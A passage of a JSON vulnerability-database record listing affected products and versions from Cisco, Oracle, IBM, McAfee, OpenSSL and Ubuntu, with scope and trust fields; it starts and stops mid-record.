"scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "16.10" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "bigfix platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus intercloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.1.3" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.8" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified wireless ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "small business spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "configuration professional", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.3.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "bigfix platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "bigfix remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.1.0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "bigfix remote control", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "storediq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "webex meetings server ssl gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "integrated management module for bladecenter yuoo", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "ironport email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-37" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "broadband access center telco and wireless", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.2" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.3.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "prime optical", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "series stackable", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "16.04" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": 